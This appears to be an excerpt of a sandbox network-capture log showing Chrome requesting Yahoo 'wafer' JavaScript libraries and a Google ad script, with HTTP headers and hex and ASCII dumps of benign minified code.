                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 537479
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 65 78 74 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 65 78 74 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-text",[],t):"object"==typeof exports?exports["wafer-text"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC812INData Raw: 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 66 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 76 61 72 20 69 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 66 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 6c 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 5f 75 74 69 6c 3d 75 28 7b 7d 2c 69 2e 5f 75 74 69 6c 2c 7b 65 6c 65 6d 3a 65 7d 29 2c 69 2e 73 74 61 74 65 44 69 64 55 70 64 61 74 65 28 29 2c 69 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 73 28 74 2c 5b 7b 6b 65 79 3a 22 73 74 61 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: length>1&&void 0!==arguments[1]?arguments[1]:{},f=r.selector;o(this,t);var i=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:f},{STATE_ATTRS:l}));return i._util=u({},i._util,{elem:e}),i.stateDidUpdate(),i}return f(t,e),s(t,[{key:"stat


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    112192.168.2.44987687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC365OUTGET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC698INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 3WRbIedcHE6I1ZfCB360pmpuvUIMgRgJEDZoYyJ8GQD7Wc7+iHddXpsnF5boeDboPldF5ikSY8ic04H99ZXbE+iOfhpejuA8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: MH0MADWHGHE8S7Z0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 23 Sep 2024 18:31:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 16 Sep 2024 04:28:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "d133cbea9c1d56d1cbe4cb6e77f0ebf6"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: 9YmMglcw85BjD8aFXilrFBHITet6QmcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 30142
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 600587
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 76 69 64 65 6f 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 76 69 64 65 6f 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-video",[],t):"object"==typeof exports?exports["wafer-video"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 76 61 72 20 69 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 65 29 74 2e 69 6e 64 65 78 4f 66 28 61 29 3e 3d 30 7c 7c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function r(e,t){var i={};for(var a in e)t.indexOf(a)>=0||Object.prototype.hasOwnProp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 69 2c 61 29 7b 72 65 74 75 72 6e 20 69 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 69 29 2c 61 26 26 65 28 74 2c 61 29 2c 74 7d 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 69 2c 61 29 7b 6e 75 6c 6c 3d 3d 3d 74 26 26 28 74 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 69 29 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 65 28 6f 2c 69 2c 61 29 7d 69 66 28 22 76 61 6c 75 65 22 69 6e 20 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: }return function(t,i,a){return i&&e(t.prototype,i),a&&e(t,a),t}}(),f=function e(t,i,a){null===t&&(t=Function.prototype);var n=Object.getOwnPropertyDescriptor(t,i);if(void 0===n){var o=Object.getPrototypeOf(t);return null===o?void 0:e(o,i,a)}if("value"in n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 74 3f 7b 7d 3a 74 2c 61 3d 72 28 65 2c 5b 22 6d 65 74 61 64 61 74 61 22 5d 29 3b 72 65 74 75 72 6e 20 76 28 7b 7d 2c 61 2c 69 29 7d 29 7c 7c 6e 75 6c 6c 2c 77 3d 76 6f 69 64 20 30 3b 69 66 28 6c 29 7b 76 61 72 20 43 3d 6c 5b 22 73 6f 75 72 63 65 2d 6d 65 74 61 64 61 74 61 2d 70 6c 75 67 69 6e 22 5d 7c 7c 7b 7d 2c 62 3d 43 5b 22 6d 65 64 69 61 2f 73 61 70 69 22 5d 3b 62 26 26 28 77 3d 7b 63 75 73 74 6f 6d 50 61 72 61 6d 73 3a 62 2e 71 73 7d 29 7d 76 61 72 20 45 3d 70 2e 64 6f 63 6b 69 6e 67 2c 50 3d 72 28 70 2c 5b 22 64 6f 63 6b 69 6e 67 22 5d 29 2c 6b 3d 6e 75 6c 6c 3b 69 66 28 45 29 7b 76 61 72 20 4f 3d 45 2e 65 6e 61 62 6c 65 4f 6e 53 63 72 6f 6c 6c 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: on(e){var t=e.metadata,i=void 0===t?{}:t,a=r(e,["metadata"]);return v({},a,i)})||null,w=void 0;if(l){var C=l["source-metadata-plugin"]||{},b=C["media/sapi"];b&&(w={customParams:b.qs})}var E=p.docking,P=r(p,["docking"]),k=null;if(E){var O=E.enableOnScrollD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 77 68 65 6e 2d 6f 75 74 2d 6f 66 2d 76 69 65 77 70 6f 72 74 22 29 2c 77 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6d 61 6e 61 67 65 2d 6f 6e 2d 69 6e 74 65 72 61 63 74 69 6f 6e 22 29 2c 43 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 6c 6f 6f 70 2d 63 6f 75 6e 74 22 29 2c 45 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 69 64 22 29 2c 50 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 74 61 72 67 65 74 22 29 2c 6b 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 4f 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 70 61 75 73 65 2d 76 69 65 77 61 62 69 6c 69 74 79 22 29 2c 56 3d 65 2e 67 65 74 41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Attribute(_+"pause-when-out-of-viewport"),w=e.getAttribute(_+"manage-on-interaction"),C=e.getAttribute(_+"loop-count"),E=e.getAttribute(_+"id"),P=e.getAttribute(_+"target"),k=e.getAttribute(_+"viewability"),O=e.getAttribute(_+"pause-viewability"),V=e.getA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 28 29 2c 6c 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 3d 6e 75 6c 6c 29 2c 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 63 26 26 6c 2e 70 6c 61 79 6c 69 73 74 44 69 64 4d 6f 75 6e 74 28 53 2c 45 29 2c 6c 7d 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2c 63 28 74 2c 5b 7b 6b 65 79 3a 22 70 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61 79 65 72 3b 65 26 26 28 65 2e 69 73 50 6c 61 79 69 6e 67 28 29 7c 7c 65 2e 70 6c 61 79 28 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 70 6c 61 79 69 6e 67 3d 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 70 61 75 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 70 6c 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (),l._state.mouseTimeout=null),"yvideoPlaylist"===c&&l.playlistDidMount(S,E),l}return o(t,e),c(t,[{key:"play",value:function(){var e=this._util.player;e&&(e.isPlaying()||e.play(),this._state.playing=!0)}},{key:"pause",value:function(){var e=this._util.pla
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 22 79 76 69 64 65 6f 22 3d 3d 3d 6e 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 49 6e 73 74 61 6e 63 65 46 72 6f 6d 55 75 69 64 43 6f 6c 6c 65 63 74 69 6f 6e 28 29 2c 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this.removeEventListeners(),"yvideo"===n&&this.removeInstanceFromUuidCollection(),f(t.prototype.__proto__||Object.getPrototypeOf(t.prototype),"destroy",this).call(this)}},{key:"_createDefault",value:function(){var e=this;if(arguments.length>0&&void 0!==ar
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 76 69 64 65 6f 2d 64 65 66 61 75 6c 74 22 29 3b 76 61 72 20 70 3d 75 2c 6d 3d 28 70 2e 68 65 69 67 68 74 2c 70 2e 77 69 64 74 68 2c 72 28 70 2c 5b 22 68 65 69 67 68 74 22 2c 22 77 69 64 74 68 22 5d 29 29 2c 68 3d 7b 7d 3b 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 79 76 69 64 65 6f 22 29 2c 66 26 26 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 2e 61 70 70 6c 79 28 79 2e 63 6c 61 73 73 4c 69 73 74 2c 66 29 2c 75 2e 66 6f 72 63 65 44 69 73 61 62 6c 65 46 69 72 73 74 41 64 26 26 50 28 22 79 76 61 70 46 22 29 3b 76 61 72 20 67 3d 76 28 7b 73 74 61 72 74 73 63 72 65 65 6e 3a 7b 73 68 6f 77 54 69 74 6c 65 3a 21 30 2c 73 68 6f 77 44 65 73 63 3a 21 30 2c 73 68 6f 77 50 72 6f 76 69 64 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: List.add("wafer-video-default");var p=u,m=(p.height,p.width,r(p,["height","width"])),h={};y.classList.add("wafer-yvideo"),f&&y.classList.add.apply(y.classList,f),u.forceDisableFirstAd&&P("yvapF");var g=v({startscreen:{showTitle:!0,showDesc:!0,showProvider
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 65 2e 62 6f 75 6e 64 61 72 79 2c 69 3d 65 2e 65 6c 65 6d 2c 61 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5f 2b 22 65 6e 64 2d 73 63 72 6e 2d 63 6c 61 73 73 22 29 2c 6e 3d 61 26 26 74 26 26 62 28 69 2c 74 29 2c 6f 3d 6e 26 26 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3b 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6e 64 53 63 72 65 65 6e 45 6c 3d 6f 7d 7d 2c 7b 6b 65 79 3a 22 5f 61 64 64 4e 61 74 69 76 65 56 69 64 65 6f 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 26 26 28 65 2e 6c 6f 6f 70 3d 21 31 2c 67 28 65 2c 22 65 6e 64 65 64 22 2c 74 68 69 73 2e 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: e.boundary,i=e.elem,a=i.getAttribute(_+"end-scrn-class"),n=a&&t&&b(i,t),o=n&&n.getElementsByClassName(a)[0];this._util.endScreenEl=o}},{key:"_addNativeVideoEvents",value:function(){var e=this._util.elem;this._state.loopCount&&(e.loop=!1,g(e,"ended",this.h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6c 6f 6f 70 43 6f 75 6e 74 3b 65 26 26 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6c 6f 6f 70 43 6f 75 6e 74 3d 4e 75 6d 62 65 72 28 65 29 29 2c 74 68 69 73 2e 5f 63 72 65 61 74 65 44 65 66 61 75 6c 74 28 21 30 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 56 69 64 65 6f 4d 6f 75 73 65 4c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 79 76 69 64 65 6f 50 6c 61 79 6c 69 73 74 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 74 79 70 65 26 26 77 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 73 65 54 69 6d 65 6f 75 74 2c 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 4e 61 74 69 76 65 56 69 64 65 6f 45 6e 64 22 2c 76 61 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: is._util.type){var e=this._util.loopCount;e&&(this._state.loopCount=Number(e)),this._createDefault(!0)}}},{key:"handleVideoMouseLeave",value:function(e){"yvideoPlaylist"===this._util.type&&w(this._state.mouseTimeout,this)}},{key:"handleNativeVideoEnd",val


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    113192.168.2.449875142.250.185.1304434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC674OUTGET /pagead/managed/js/gpt/m202409240101/pubads_impl.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC746INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 489606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 15:52:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: Tue, 30 Sep 2025 15:52:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 5325
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: 11534241471022370290
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=ISO-8859-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
